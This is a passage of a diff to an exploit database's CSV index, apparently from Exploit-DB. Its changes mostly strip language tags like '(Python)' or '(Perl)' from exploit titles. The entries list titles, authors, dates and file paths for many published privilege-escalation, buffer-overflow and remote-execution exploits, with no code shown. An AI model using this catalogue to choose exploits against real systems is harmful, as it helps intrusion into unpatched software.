'Lowerer::LowerBoundCheck' Incorrect Integer Overflow Check",2017-11-16,"Google Security Research",dos,windows, 20373,exploits/hp-ux/dos/20373.txt,"HP-UX 9.x/10.x/11.x - cu Buffer Overflow",2000-11-02,zorgon,dos,hp-ux, @@ -4369,7 +4369,7 @@ id,file,description,date,author,type,platform,port 34521,exploits/linux/dos/34521.txt,"Oracle MySQL < 5.1.49 - Malformed 'BINLOG' Arguments Denial of Service",2010-08-20,"Shane Bester",dos,linux, 34522,exploits/linux/dos/34522.txt,"Oracle MySQL < 5.1.49 - 'DDL' Statements Denial of Service",2010-07-09,"Elena Stepanova",dos,linux, 34530,exploits/windows/dos/34530.py,"Crystal Player 1.98 - '.mls' Buffer Overflow",2010-08-20,"Praveen Darshanam",dos,windows, -34540,exploits/windows/dos/34540.py,"BulletProof FTP Client 2010 - Buffer Overflow (SEH) (Python)",2014-09-05,"Robert Kugler",dos,windows, +34540,exploits/windows/dos/34540.py,"BulletProof FTP Client 2010 - Buffer Overflow (SEH)",2014-09-05,"Robert Kugler",dos,windows, 34588,exploits/aix/dos/34588.txt,"PHP Stock Management System 1.02 - Multiple Vulnerabilities",2014-09-09,jsass,dos,aix, 34603,exploits/windows/dos/34603.py,"Adobe Acrobat and Reader 9.3.4 - 'acroform_PlugInMain' Memory Corruption",2010-09-06,ITSecTeam,dos,windows, 34602,exploits/windows/dos/34602.html,"Microsoft Internet Explorer 7/8 - CSS Handling Cross Domain Information Disclosure",2010-09-06,"Chris Evans",dos,windows, @@ -6807,7 +6807,7 @@ id,file,description,date,author,type,platform,port 180,exploits/linux/local/180.c,"GnomeHack 1.0.5 - Local Buffer Overflow",2000-11-15,vade79,local,linux, 182,exploits/linux/local/182.sh,"RedHat 6.2 - '/sbin/restore' Local Privilege Escalation",2000-11-16,anonymous,local,linux, 183,exploits/linux/local/183.c,"Oracle (oidldapd connect) - Local Command Line Overflow",2000-11-16,anonymous,local,linux, -184,exploits/linux/local/184.pl,"RedHat 6.2 Restore and Dump - Local Privilege Escalation (Perl)",2000-11-16,Tlabs,local,linux, +184,exploits/linux/local/184.pl,"RedHat 6.2 Restore and Dump - Local Privilege Escalation",2000-11-16,Tlabs,local,linux, 186,exploits/linux/local/186.pl,"xsplumber - 'strcpy()' Local Buffer Overflow",2000-11-17,vade79,local,linux, 193,exploits/linux/local/193.sh,"dump 0.4b15 - Local Privilege Escalation",2000-11-19,mat,local,linux, 197,exploits/solaris/local/197.c,"Solaris/SPARC 2.7 / 7 locale - Format String",2000-11-20,"Solar Eclipse",local,solaris, @@ -6914,7 +6914,7 @@ id,file,description,date,author,type,platform,port 629,exploits/multiple/local/629.c,"Multiple AntiVirus - '.zip' Detection Bypass",2004-11-14,oc192,local,multiple, 657,exploits/linux/local/657.c,"atari800 - Local Privilege Escalation",2004-11-25,pi3,local,linux, 669,exploits/linux/local/669.c,"Aspell (word-list-compress) - Command Line Stack Overflow",2004-12-01,c0d3r,local,linux, -680,exploits/osx/local/680.txt,"Apple Mac OSX Adobe Version Cue - Local Privilege Escalation (Bash)",2004-12-08,"Jonathan Bringhurst",local,osx, +680,exploits/osx/local/680.txt,"Apple Mac OSX Adobe Version Cue - Local Privilege Escalation",2004-12-08,"Jonathan Bringhurst",local,osx, 684,exploits/linux/local/684.c,"TipxD 1.1.1 - Not SETUID Local Format String",2004-12-14,CoKi,local,linux, 694,exploits/windows/local/694.c,"WinRAR 3.4.1 - Corrupt '.ZIP' File",2004-12-16,"Vafa Khoshaein",local,windows, 695,exploits/linux/local/695.c,"Cscope 15.5 - Symlink",2004-12-17,Gangstuck,local,linux, @@ -6942,7 +6942,7 @@ id,file,description,date,author,type,platform,port 791,exploits/linux/local/791.c,"Setuid perl - 'PerlIO_Debug()' Local Overflow",2005-02-07,"Kevin Finisterre",local,linux, 792,exploits/linux/local/792.c,"Setuid perl - 'PerlIO_Debug()' Root Owned File Creation Privilege Escalation",2005-02-07,"Kevin Finisterre",local,linux, 793,exploits/osx/local/793.pl,"Apple Mac OSX - '.DS_Store' Arbitrary File Overwrite",2005-02-07,vade79,local,osx, -795,exploits/osx/local/795.pl,"Apple Mac OSX Adobe Version Cue - Local Privilege Escalation (Perl)",2005-02-07,0xdeadbabe,local,osx, +795,exploits/osx/local/795.pl,"Apple Mac OSX Adobe Version Cue - Local Privilege Escalation",2005-02-07,0xdeadbabe,local,osx, 796,exploits/linux/local/796.sh,"Exim 4.42 - Local Privilege Escalation",2005-02-07,darkeagle,local,linux, 798,exploits/windows/local/798.c,"DelphiTurk CodeBank 3.1 - Local Username and Password Disclosure",2005-02-08,Kozan,local,windows, 803,exploits/windows/local/803.c,"DelphiTurk FTP 1.0 - Passwords to Local Users",2005-02-09,Kozan,local,windows, @@ -6993,7 +6993,7 @@ id,file,description,date,author,type,platform,port 971,exploits/windows/local/971.cpp,"BulletProof FTP Server 2.4.0.31 - Local Privilege Escalation",2005-04-29,"Jerome Athias",local,windows, 972,exploits/solaris/local/972.c,"Solaris 10.x - ESRI Arcgis Format String Privilege Escalation",2005-04-30,"Kevin Finisterre",local,solaris, 973,exploits/linux/local/973.c,"ARPUS/Ce - Local File Overwrite (setuid)",2005-05-01,"Kevin Finisterre",local,linux, -974,exploits/linux/local/974.pl,"ARPUS/Ce - Local Overflow (setuid) (Perl)",2005-05-01,"Kevin Finisterre",local,linux, +974,exploits/linux/local/974.pl,"ARPUS/Ce - Local Overflow (setuid)",2005-05-01,"Kevin Finisterre",local,linux, 997,exploits/linux/local/997.sh,"cdrdao (Mandrake 10.2) - Local Privilege Escalation",2005-05-17,newbug,local,linux, 1001,exploits/aix/local/1001.txt,"AIX 5.1 Bellmail - Local Race Condition",2005-05-19,watercloud,local,aix, 1009,exploits/linux/local/1009.c,"Exim 4.41 - 'dns_build_reverse' Local Read Emails",2005-05-25,Plugger,local,linux, @@ -7047,7 +7047,7 @@ id,file,description,date,author,type,platform,port 1406,exploits/windows/local/1406.php,"PHP 4.4.0 - 'mysql_connect function' Local Buffer Overflow",2006-01-05,mercenary,local,windows, 1407,exploits/windows/local/1407.c,"Microsoft Windows Server 2000 Kernel - APC Data-Free Local Escalation (MS05-055)",2006-01-05,SoBeIt,local,windows, 1412,exploits/linux/local/1412.rb,"Xmame 0.102 - '-lang' Local Buffer Overflow",2006-01-10,xwings,local,linux, -1415,exploits/linux/local/1415.c,"Xmame 0.102 - 'lang' Local Buffer Overflow (C)",2006-01-13,Qnix,local,linux, +1415,exploits/linux/local/1415.c,"Xmame 0.102 - 'lang' Local Buffer Overflow",2006-01-13,Qnix,local,linux, 1425,exploits/linux/local/1425.c,"Xmame 0.102 - '-pb/-lang/-rec' Local Buffer Overflow",2006-01-21,sj,local,linux, 1445,exploits/linux/local/1445.c,"Eterm LibAST < 0.7 - '-X' Option Privilege Escalation",2006-01-24,"Johnny Mast",local,linux, 1449,exploits/linux/local/1449.c,"SquirrelMail 3.1 - Change Passwd Plugin Local Buffer Overflow",2006-01-25,"rod hedor",local,linux, @@ -7377,7 +7377,7 @@ id,file,description,date,author,type,platform,port 7516,exploits/windows/local/7516.txt,"ESET Smart Security 3.0.672 - 'epfw.sys' Local Privilege Escalation",2008-12-18,"NT Internals",local,windows, 7533,exploits/windows/local/7533.txt,"PowerStrip 3.84 - 'pstrip.sys' Local Privilege Escalation",2008-12-21,"NT Internals",local,windows, 7536,exploits/windows/local/7536.cpp,"CoolPlayer 2.19 - '.Skin' Local Buffer Overflow",2008-12-21,r0ut3r,local,windows, -7547,exploits/windows/local/7547.py,"CoolPlayer 2.19 - '.Skin' Local Buffer Overflow (Python)",2008-12-22,Encrypt3d.M!nd,local,windows, +7547,exploits/windows/local/7547.py,"CoolPlayer 2.19 - '.Skin' Local Buffer Overflow",2008-12-22,Encrypt3d.M!nd,local,windows, 7550,exploits/multiple/local/7550.c,"CUPS < 1.3.8-4 - Local Privilege Escalation",2008-12-22,"Jon Oberheide",local,multiple, 7577,exploits/windows/local/7577.pl,"Acoustica Mixcraft 4.2 - Universal Stack Overflow (SEH)",2008-12-24,SkD,local,windows, 7581,exploits/freebsd/local/7581.c,"FreeBSD 6x/7 - 'protosw' Local Privilege Escalation",2008-12-28,"Don Bailey",local,freebsd, @@ -7409,8 +7409,8 @@ id,file,description,date,author,type,platform,port 7745,exploits/windows/local/7745.py,"VUPlayer 2.49 - '.asx' Universal Local Buffer Overflow",2009-01-13,Encrypt3d.M!nd,local,windows, 7765,exploits/windows/local/7765.py,"OtsTurntables 1.00.027 - '.ofl' Local Stack Overflow",2009-01-14,suN8Hclf,local,windows, 7839,exploits/windows/local/7839.py,"Total Video Player 1.31 - 'DefaultSkin.ini' Local Stack Overflow",2009-01-20,His0k4,local,windows, -7843,exploits/windows/local/7843.c,"Browser3D 3.5 - '.sfs' Local Stack Overflow (C)",2009-01-22,SimO-s0fT,local,windows, -7848,exploits/windows/local/7848.pl,"Browser3D 3.5 - '.sfs' Local Stack Overflow (Perl)",2009-01-22,AlpHaNiX,local,windows, +7843,exploits/windows/local/7843.c,"Browser3D 3.5 - '.sfs' Local Stack Overflow",2009-01-22,SimO-s0fT,local,windows, +7848,exploits/windows/local/7848.pl,"Browser3D 3.5 - '.sfs' Local Stack Overflow",2009-01-22,AlpHaNiX,local,windows, 7853,exploits/windows/local/7853.pl,"Elecard MPEG Player - '.m3u' Local Stack Overflow",2009-01-25,AlpHaNiX,local,windows, 7855,exploits/linux/local/7855.txt,"PostgreSQL 8.2/8.3/8.4 - UDF for Command Execution",2009-01-25,"Bernardo Damele",local,linux, 7856,exploits/linux/local/7856.txt,"MySQL 4/5/6 - UDF for Command Execution",2009-01-25,"Bernardo Damele",local,linux, @@ -7520,7 +7520,7 @@ id,file,description,date,author,type,platform,port 8657,exploits/windows/local/8657.txt,"EasyPHP 3.0 - Arbitrary Modify Configuration File",2009-05-11,Zigma,local,windows, 8660,exploits/windows/local/8660.pl,"CastRipper 2.50.70 - '.m3u' Local Buffer Overflow",2009-05-12,[0]x80->[H]4x²0r,local,windows, 8661,exploits/windows/local/8661.pl,"CastRipper 2.50.70 - '.m3u' Universal Stack Overflow",2009-05-12,Stack,local,windows, -8662,exploits/windows/local/8662.py,"CastRipper 2.50.70 - '.m3u' Universal Stack Overflow (Python)",2009-05-12,"Super Cristal",local,windows, +8662,exploits/windows/local/8662.py,"CastRipper 2.50.70 - '.m3u' Universal Stack Overflow",2009-05-12,"Super Cristal",local,windows, 8663,exploits/windows/local/8663.pl,"CastRipper 2.50.70 - '.pls' Universal Stack Overflow",2009-05-12,zAx,local,windows, 8670,exploits/windows/local/8670.php,"Pinnacle Studio 12 - '.hfz' Directory Traversal",2009-05-13,Nine:Situations:Group,local,windows, 8673,exploits/linux/local/8673.c,"Linux Kernel 2.6.x (Gentoo 2.6.29rc1) - 'ptrace_attach' Local Privilege Escalation",2009-05-13,s0m3b0dy,local,linux, @@ -7573,7 +7573,7 @@ id,file,description,date,author,type,platform,port 9229,exploits/windows/local/9229.py,"WINMOD 1.4 - '.lst' Universal Buffer Overflow (SEH) (2)",2009-07-22,Dz_Girl,local,windows, 9234,exploits/windows/local/9234.pl,"WINMOD 1.4 - '.lst' Local Stack Overflow",2009-07-23,"CWH Underground",local,windows, 40297,exploits/windows/local/40297.py,"NScan 0.9.1 - 'Target' Local Buffer Overflow",2016-08-29,hyp3rlinx,local,windows, -9272,exploits/windows/local/9272.py,"Adobe Acrobat 9.1.2 NOS - Local Privilege Escalation (Python)",2009-07-27,Dr_IDE,local,windows, +9272,exploits/windows/local/9272.py,"Adobe Acrobat 9.1.2 NOS - Local Privilege Escalation",2009-07-27,Dr_IDE,local,windows, 9286,exploits/windows/local/9286.pl,"MP3 Studio 1.0 - '.mpf' / '.m3u' Local Stack Overflow (SEH)",2009-07-28,corelanc0d3r,local,windows, 9291,exploits/windows/local/9291.pl,"MP3 Studio 1.0 - '.mpf' Local Buffer Overflow (SEH)",2009-07-28,Koshi,local,windows, 9298,exploits/windows/local/9298.pl,"Millenium MP3 Studio 1.0 - '.mpf' Local Stack Overflow (2)",2009-07-30,corelanc0d3r,local,windows, @@ -7754,9 +7754,9 @@ id,file,description,date,author,type,platform,port 10747,exploits/windows/local/10747.py,"Mini-stream Ripper (Windows XP SP2/SP3) - Local Overflow",2009-12-27,dijital1,local,windows, 10748,exploits/windows/local/10748.rb,"Mini-stream 3.0.1.1 - Local Buffer Overflow (Metasploit)",2009-12-27,dijital1,local,windows, 10759,exploits/windows/local/10759.pl,"M.J.M. Quick Player 1.2 - Local Stack Buffer Overflow",2009-12-28,corelanc0d3r,local,windows, -10782,exploits/windows/local/10782.pl,"Mini-stream Ripper 3.0.1.1 - '.pls' Universal Buffer Overflow (Perl)",2009-12-29,jacky,local,windows, -10786,exploits/windows/local/10786.py,"Soritong 1.0 - Universal Buffer Overflow (Python)",2009-12-29,jacky,local,windows, -10787,exploits/windows/local/10787.py,"Mini-stream Ripper 3.0.1.1 - '.pls' Universal Buffer Overflow (Python)",2009-12-29,jacky,local,windows, +10782,exploits/windows/local/10782.pl,"Mini-stream Ripper 3.0.1.1 - '.pls' Universal Buffer Overflow",2009-12-29,jacky,local,windows, +10786,exploits/windows/local/10786.py,"Soritong 1.0 - Universal Buffer Overflow",2009-12-29,jacky,local,windows, +10787,exploits/windows/local/10787.py,"Mini-stream Ripper 3.0.1.1 - '.pls' Universal Buffer Overflow",2009-12-29,jacky,local,windows, 10797,exploits/windows/local/10797.py,"Quick Player 1.2 - Unicode Buffer Overflow (1)",2009-12-30,mr_me,local,windows, 10827,exploits/windows/local/10827.rb,"DJ Studio Pro 5.1.6.5.2 - Local Overflow (SEH)",2009-12-30,"Sébastien Duquette",local,windows, 10920,exploits/windows/local/10920.cpp,"VirtualDJ Trial 6.0.6 'New Year Edition' - '.m3u' Local Overflow",2010-01-02,"fl0 fl0w",local,windows, @@ -9458,7 +9458,7 @@ id,file,description,date,author,type,platform,port 27874,exploits/windows/local/27874.py,"Winamp 5.63 - 'winamp.ini' Local Overflow",2013-08-26,"Ayman Sagy",local,windows, 27938,exploits/linux/local/27938.rb,"VMware - Setuid VMware-mount Unsafe popen(3) (Metasploit)",2013-08-29,Metasploit,local,linux, 27944,exploits/osx/local/27944.rb,"Apple Mac OSX - Sudo Password Bypass (Metasploit)",2013-08-29,Metasploit,local,osx, -27965,exploits/osx/local/27965.py,"Apple Mac OSX 10.8.4 - Local Privilege Escalation (Python)",2013-08-30,"David Kennedy (ReL1K)",local,osx, +27965,exploits/osx/local/27965.py,"Apple Mac OSX 10.8.4 - Local Privilege Escalation",2013-08-30,"David Kennedy (ReL1K)",local,osx, 28084,exploits/windows/local/28084.html,"KingView 6.53 - 'SuperGrid' Insecure ActiveX Control",2013-09-04,blake,local,windows, 28130,exploits/windows/local/28130.rb,"IKE and AuthIP IPsec Keyring Modules Service (IKEEXT) - Missing DLL (Metasploit)",2013-09-06,Metasploit,local,windows, 28287,exploits/linux/local/28287.c,"Linux-HA Heartbeat 1.2.3/2.0.x - Insecure Default Permissions on Shared Memory",2006-07-27,anonymous,local,linux, @@ -9726,7 +9726,7 @@ id,file,description,date,author,type,platform,port 35395,exploits/windows/local/35395.txt,"CCH Wolters Kluwer PFX Engagement 7.1 - Local Privilege Escalation",2014-11-28,"Information Paradox",local,windows, 35423,exploits/windows/local/35423.txt,"Thomson Reuters Fixed Assets CS 13.1.4 - Local Privilege Escalation",2014-12-02,"Information Paradox",local,windows, 35440,exploits/osx/local/35440.rb,"Apple Mac OSX - IOKit Keyboard Driver Privilege Escalation (Metasploit)",2014-12-02,Metasploit,local,osx, -35449,exploits/windows/local/35449.rb,"BulletProof FTP Client 2010 - Local Buffer Overflow (SEH) (Ruby)",2014-12-03,"Muhamad Fadzil Ramli",local,windows, +35449,exploits/windows/local/35449.rb,"BulletProof FTP Client 2010 - Local Buffer Overflow (SEH)",2014-12-03,"Muhamad Fadzil Ramli",local,windows, 35450,exploits/linux/local/35450.txt,"VFU 4.10-1.1 - Local Buffer Overflow",2014-12-03,"Juan Sacco",local,linux, 35472,exploits/linux_x86-64/local/35472.txt,"Offset2lib - Bypassing Full ASLR On 64 bit Linux",2014-12-05,"Packet Storm",local,linux_x86-64, 35488,exploits/osx/local/35488.c,"Apple Mac OSX 10.6.x - HFS Subsystem Information Disclosure",2011-03-21,"Dan Rosenberg",local,osx, @@ -10018,7 +10018,7 @@ id,file,description,date,author,type,platform,port 39791,exploits/multiple/local/39791.rb,"ImageMagick 6.9.3-9 / 7.0.1-0 - 'ImageTragick' Delegate Arbitrary Command Execution (Metasploit)",2016-05-09,Metasploit,local,multiple, 39803,exploits/windows/local/39803.txt,"FileZilla FTP Client 3.17.0.0 - Unquoted Path Privilege Escalation",2016-05-11,"Cyril Vallicari",local,windows, 39804,exploits/windows/local/39804.txt,"Intuit QuickBooks Desktop 2007 < 2016 - Arbitrary Code Execution",2016-05-11,"Maxim Tomashevich",local,windows, -39809,exploits/windows/local/39809.cs,"Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Local Privilege Escalation (MS16-032) (C#)",2016-04-25,fdiskyou,local,windows, +39809,exploits/windows/local/39809.cs,"Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Local Privilege Escalation (MS16-032)",2016-04-25,fdiskyou,local,windows, 39810,exploits/linux/local/39810.py,"NRSS Reader 0.3.9 - Local Stack Overflow",2016-05-13,"Juan Sacco",local,linux, 39811,exploits/linux/local/39811.txt,"runAV mod_security - Arbitrary Command Execution",2016-05-13,R-73eN,local,linux, 39814,exploits/windows/local/39814.txt,"Multiples Nexon Games - Unquoted Path Privilege Escalation",2016-05-16,"Cyril Vallicari",local,windows, @@ -11134,7 +11134,7 @@ id,file,description,date,author,type,platform,port 48251,exploits/windows/local/48251.txt,"10-Strike Network Inventory Explorer - 'srvInventoryWebServer' Unquoted Service Path",2020-03-25,"Felipe Winsnes",local,windows, 48253,exploits/windows/local/48253.py,"10-Strike Network Inventory Explorer 8.54 - 'Add' Local Buffer Overflow (SEH)",2020-03-25,"Felipe Winsnes",local,windows, 48257,exploits/windows/local/48257.py,"Easy RM to MP3 Converter 2.7.3.700 - 'Input' Local Buffer Overflow (SEH)",2020-03-27,"Felipe Winsnes",local,windows, -48264,exploits/windows/local/48264.py,"10-Strike Network Inventory Explorer 9.03 - 'Read from File' Buffer Overflow (SEH)(ROP)",2020-03-30,Hodorsec,local,windows, +48264,exploits/windows/local/48264.py,"10-Strike Network Inventory Explorer 9.03 - 'Read from File' Buffer Overflow (SEH) (ROP)",2020-03-30,Hodorsec,local,windows, 48267,exploits/windows/local/48267.txt,"Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Local Privilege Escalation",2020-03-30,"Daniel García Gutiérrez",local,windows, 48277,exploits/windows/local/48277.py,"10Strike LANState 9.32 - 'Force Check' Buffer Overflow (SEH)",2020-04-01,Hodorsec,local,windows, 48279,exploits/windows/local/48279.py,"DiskBoss 7.7.14 - 'Input Directory' Local Buffer Overflow (PoC)",2020-04-02,"Paras Bhatia",local,windows, @@ -11144,7 +11144,7 @@ id,file,description,date,author,type,platform,port 48299,exploits/windows/local/48299.txt,"Microsoft NET USE win10 - Insufficient Authentication Logic",2020-04-06,hyp3rlinx,local,windows, 48306,exploits/windows/local/48306.txt,"Windscribe 1.83 - 'WindscribeService' Unquoted Service Path",2020-04-10,MgThuraMoeMyint,local,windows, 48314,exploits/windows_x86/local/48314.py,"Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH)",2020-04-13,boku,local,windows_x86, -48317,exploits/windows/local/48317.py,"B64dec 1.1.2 - Buffer Overflow (SEH Overflow + Egg Hunter)",2020-04-14,"Andy Bowden",local,windows, +48317,exploits/windows/local/48317.py,"B64dec 1.1.2 - Buffer Overflow (SEH Overflow + EggHunter)",2020-04-14,"Andy Bowden",local,windows, 48329,exploits/windows/local/48329.py,"BlazeDVD 7.0.2 - Buffer Overflow (SEH)",2020-04-15,areyou1or0,local,windows, 48337,exploits/macos/local/48337.rb,"VMware Fusion - USB Arbitrator Setuid Privilege Escalation (Metasploit)",2020-04-16,Metasploit,local,macos, 48339,exploits/windows/local/48339.py,"Easy MPEG to DVD Burner 1.7.11 - Buffer Overflow (SEH + DEP)",2020-04-17,"Bailey Belisario",local,windows, @@ -11180,7 +11180,7 @@ id,file,description,date,author,type,platform,port 48543,exploits/windows/local/48543.txt,"IObit Uninstaller 9.5.0.15 - 'IObit Uninstaller Service' Unquoted Service Path",2020-06-04,Gobinathan,local,windows, 48563,exploits/windows/local/48563.py,"Frigate 3.36.0.9 - 'Command Line' Local Buffer Overflow (SEH) (PoC)",2020-06-08,"Paras Bhatia",local,windows, 48564,exploits/windows/local/48564.py,"Quick Player 1.3 - '.m3l' Buffer Overflow (Unicode & SEH)",2020-06-08,"Felipe Winsnes",local,windows, -48570,exploits/windows/local/48570.py,"10-Strike Bandwidth Monitor 3.9 - Buffer Overflow (SEH_DEP_ASLR)",2020-06-10,boku,local,windows, +48570,exploits/windows/local/48570.py,"10-Strike Bandwidth Monitor 3.9 - Buffer Overflow (SEH) (ASLR + DEP Bypass)",2020-06-10,boku,local,windows, 48573,exploits/windows/local/48573.txt,"WinGate 9.4.1.5998 - Insecure Folder Permissions",2020-06-10,hyp3rlinx,local,windows, 48579,exploits/windows/local/48579.py,"Frigate Professional 3.36.0.9 - 'Find Computer' Local Buffer Overflow (SEH) (PoC)",2020-06-11,"Paras Bhatia",local,windows, 48591,exploits/windows/local/48591.txt,"Bandwidth Monitor 3.9 - 'Svc10StrikeBandMontitor' Unquoted Service Path",2020-06-16,boku,local,windows, @@ -11715,9 +11715,9 @@ id,file,description,date,author,type,platform,port 1915,exploits/windows/remote/1915.pm,"CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit) (1)",2006-06-15,c0rrupt,remote,windows, 1940,exploits/windows/remote/1940.pm,"Microsoft Windows RRAS - Remote Stack Overflow (MS06-025) (Metasploit)",2006-06-22,"H D Moore",remote,windows,445 1965,exploits/windows/remote/1965.pm,"Microsoft Windows - RRAS RASMAN Registry Stack Overflow (MS06-025) (Metasploit)",2006-06-29,Pusscat,remote,windows,445 -1997,exploits/multiple/remote/1997.php,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (PHP)",2006-07-09,joffer,remote,multiple,10000 +1997,exploits/multiple/remote/1997.php,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure",2006-07-09,joffer,remote,multiple,10000 2014,exploits/windows/remote/2014.pl,"Winlpd 1.2 Build 1076 - Remote Buffer Overflow",2006-07-15,"Pablo Isola",remote,windows,515 -2017,exploits/multiple/remote/2017.pl,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (Perl)",2006-07-15,UmZ,remote,multiple,10000 +2017,exploits/multiple/remote/2017.pl,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure",2006-07-15,UmZ,remote,multiple,10000 2034,exploits/hardware/remote/2034.txt,"BT Voyager 2091 (Wireless ADSL) - Multiple Vulnerabilities",2006-07-18,"Adrian _pagvac_ Pastor",remote,hardware, 2047,exploits/windows/remote/2047.pl,"FileCOPA FTP Server 1.01 - 'LIST' Remote Buffer Overflow (1)",2006-07-20,"Jacopo Cervini",remote,windows, 2048,exploits/hardware/remote/2048.pl,"Cisco/Protego CS-MARS < 4.2.1 - 'JBoss' Remote Code Execution",2006-07-20,"Jon Hart",remote,hardware, @@ -11757,7 +11757,7 @@ id,file,description,date,author,type,platform,port 2403,exploits/windows/remote/2403.c,"Microsoft Internet Explorer - 'VML' Remote Buffer Overflow",2006-09-20,nop,remote,windows, 2408,exploits/windows/remote/2408.pl,"Microsoft Internet Explorer (Windows XP SP1) - 'VML' Remote Buffer Overflow",2006-09-21,"Trirat Puttaraksa",remote,windows, 2425,exploits/windows/remote/2425.html,"Microsoft Internet Explorer (Windows XP SP2) - 'VML' Remote Buffer Overflow",2006-09-24,jamikazu,remote,windows, -2426,exploits/windows/remote/2426.pl,"Microsoft Internet Explorer - 'VML' Remote Buffer Overflow (SP2) (Perl)",2006-09-25,"Trirat Puttaraksa",remote,windows, +2426,exploits/windows/remote/2426.pl,"Microsoft Internet Explorer - 'VML' Remote Buffer Overflow (SP2)",2006-09-25,"Trirat Puttaraksa",remote,windows, 2440,exploits/windows/remote/2440.rb,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (Metasploit) (1)",2006-09-27,"H D Moore",remote,windows, 2445,exploits/windows/remote/2445.c,"NaviCOPA Web Server 2.01 - 'GET' Remote Buffer Overflow",2006-09-27,h07,remote,windows,80 2448,exploits/windows/remote/2448.html,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() (HTML)",2006-09-28,jamikazu,remote,windows, @@ -11787,7 +11787,7 @@ id,file,description,date,author,type,platform,port 2785,exploits/windows/remote/2785.c,"WinZip 10.0.7245 - FileView ActiveX Remote Buffer Overflow",2006-11-15,prdelka,remote,windows, 2789,exploits/windows/remote/2789.cpp,"Microsoft Windows - NetpManageIPCConnect Stack Overflow (MS06-070)",2006-11-16,cocoruder,remote,windows, 2800,exploits/windows/remote/2800.cpp,"Microsoft Windows - Wkssvc NetrJoinDomain2 Stack Overflow (MS06-070)",2006-11-17,"S A Stevens",remote,windows, -2809,exploits/windows/remote/2809.py,"Microsoft Windows - 'NetpManageIPCConnect' Remote Stack Overflow (MS06-070) (Python)",2006-11-18,"Winny Thomas",remote,windows,445 +2809,exploits/windows/remote/2809.py,"Microsoft Windows - 'NetpManageIPCConnect' Remote Stack Overflow (MS06-070)",2006-11-18,"Winny Thomas",remote,windows,445 2837,exploits/multiple/remote/2837.sql,"Oracle 9i/10g - 'read/write/execute' ation Suite",2006-11-23,"Marco Ivaldi",remote,multiple, 2856,exploits/linux/remote/2856.pm,"ProFTPd 1.3.0 - 'sreplace' Remote Stack Overflow (Metasploit)",2006-11-27,"Evgeny Legerov",remote,linux,21 2858,exploits/linux/remote/2858.c,"Evince Document Viewer - 'DocumentMedia' Remote Buffer Overflow",2006-11-28,K-sPecial,remote,linux, @@ -11854,7 +11854,7 @@ id,file,description,date,author,type,platform,port 3378,exploits/multiple/remote/3378.pl,"Oracle 9i/10g ACTIVATE_SUBSCRIPTION - SQL Injection (2)",2007-02-26,bunker,remote,multiple, 3380,exploits/windows/remote/3380.txt,"Kiwi CatTools TFTP 3.2.8 - Directory Traversal",2007-02-27,"Sergey Gordeychik",remote,windows, 3381,exploits/windows/remote/3381.pl,"NetProxy 4.03 - Web Filter Evasion / Bypass Logging",2007-02-27,"Craig Heffner",remote,windows, -3388,exploits/windows/remote/3388.pl,"3Com TFTP Service (3CTftpSvc) 2.0.1 - Long Transporting Mode (Perl)",2007-02-28,"Umesh Wanve",remote,windows,69 +3388,exploits/windows/remote/3388.pl,"3Com TFTP Service (3CTftpSvc) 2.0.1 - Long Transporting Mode",2007-02-28,"Umesh Wanve",remote,windows,69 3389,exploits/linux/remote/3389.c,"Madwifi 0.9.2.1 - WPA/RSN IE Remote Kernel Buffer Overflow",2007-03-01,"Massimiliano Oldani",remote,linux, 3391,exploits/windows/remote/3391.py,"Snort 2.6.1 - DCE/RPC Preprocessor Remote Buffer Overflow",2007-03-01,"Trirat Puttaraksa",remote,windows, 3395,exploits/windows/remote/3395.c,"WebMod 0.48 - Content-Length Remote Buffer Overflow",2007-03-01,cybermind,remote,windows, @@ -11866,8 +11866,8 @@ id,file,description,date,author,type,platform,port 3452,exploits/multiple/remote/3452.php,"PHP 5.2.0 - EXT/Filter FDF Post Filter Bypass",2007-03-10,"Stefan Esser",remote,multiple, 3462,exploits/windows/remote/3462.cpp,"NewsReactor 20070220 - Article Grabbing Remote Buffer Overflow (1)",2007-03-12,Marsu,remote,windows, 3463,exploits/windows/remote/3463.cpp,"NewsReactor 20070220 - Article Grabbing Remote Buffer Overflow (2)",2007-03-12,Marsu,remote,windows, -3474,exploits/windows/remote/3474.py,"WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow (Python)",2007-03-14,"Winny Thomas",remote,windows,21 -3482,exploits/windows/remote/3482.pl,"WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow (Perl)",2007-03-15,"Umesh Wanve",remote,windows,21 +3474,exploits/windows/remote/3474.py,"WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow",2007-03-14,"Winny Thomas",remote,windows,21 +3482,exploits/windows/remote/3482.pl,"WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow",2007-03-15,"Umesh Wanve",remote,windows,21 3491,exploits/bsd/remote/3491.py,"OpenBSD - ICMPv6 Fragment Remote Execution",2007-03-15,"Core Security",remote,bsd, 3495,exploits/windows/remote/3495.txt,"CA BrightStor ARCserve - 'msgeng.exe' Remote Stack Overflow",2007-03-16,"Winny Thomas",remote,windows,6503 3531,exploits/windows/remote/3531.py,"Helix Server 11.0.1 (Windows 2000 SP4) - Remote Heap Overflow",2007-03-21,"Winny Thomas",remote,windows,554 @@ -12091,7 +12091,7 @@ id,file,description,date,author,type,platform,port 4745,exploits/windows/remote/4745.cpp,"Microsoft Windows Message Queuing Service - RPC Buffer Overflow (MS07-065) (1)",2007-12-18,axis,remote,windows, 4746,exploits/windows/remote/4746.html,"RavWare Software - '.MAS' Flic Control Remote Buffer Overflow",2007-12-18,shinnai,remote,windows, 4747,exploits/windows/remote/4747.vbs,"RaidenHTTPD 2.0.19 - 'ulang' Remote Command Execution",2007-12-18,rgod,remote,windows, -4754,exploits/windows_x86/remote/4754.pl,"3proxy 0.5.3g (Windows x86) - 'logurl()' Remote Buffer 